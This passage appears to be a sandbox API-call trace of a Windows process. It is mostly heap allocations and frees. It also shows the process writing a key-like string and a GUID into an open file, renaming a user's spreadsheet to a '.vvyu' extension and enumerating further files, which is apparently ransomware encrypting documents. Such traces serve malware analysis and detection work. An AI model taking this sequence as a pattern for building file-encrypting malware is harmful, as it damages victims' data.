RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0186.679] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0186.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d3a670 [0186.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0186.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0186.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0186.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb10 [0186.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4eaf8 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0186.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0186.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0186.683] GetCurrentThreadId () returned 0x264 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37648 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0186.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.684] GetCurrentThreadId () returned 0x264 [0186.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0186.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0186.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82bc0 [0186.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0186.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0186.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eb10 [0186.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0186.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0186.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0186.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39688 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396b8 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0186.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0186.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0186.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0186.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42d20 [0186.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0186.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0186.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42f38 [0186.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0186.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0186.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0186.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0186.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0186.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d20 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42f38 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0186.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0186.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0186.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb28 | out: hHeap=0x6a0000) returned 1 [0186.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0186.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0186.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0186.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0186.697] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x40a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb14*=0x40a, lpOverlapped=0x0) returned 1 [0186.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.697] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x40f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.697] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0186.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0186.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0186.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0186.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0186.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0186.699] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0186.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0186.699] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0186.699] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0186.700] CloseHandle (hObject=0x584) returned 1 [0186.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0186.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0186.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0186.701] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\zzDsCcZ.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\zzdsccz.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\zzDsCcZ.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\zzdsccz.xlsx.vvyu")) returned 1 [0186.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.703] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.707] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f3f3e0, ftCreationTime.dwHighDateTime=0x1d8a67e, ftLastAccessTime.dwLowDateTime=0x8a5bc880, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x8a5bc880, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x40f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zzDsCcZ.xlsx", cAlternateFileName="ZZDSCC~1.XLS")) returned 0 [0186.707] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0186.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0186.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0186.722] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0186.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0186.723] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0186.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0186.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0186.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0186.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0186.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0186.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0186.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38958 | out: hHeap=0x6a0000) returned 1 [0186.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.733] HeapFree 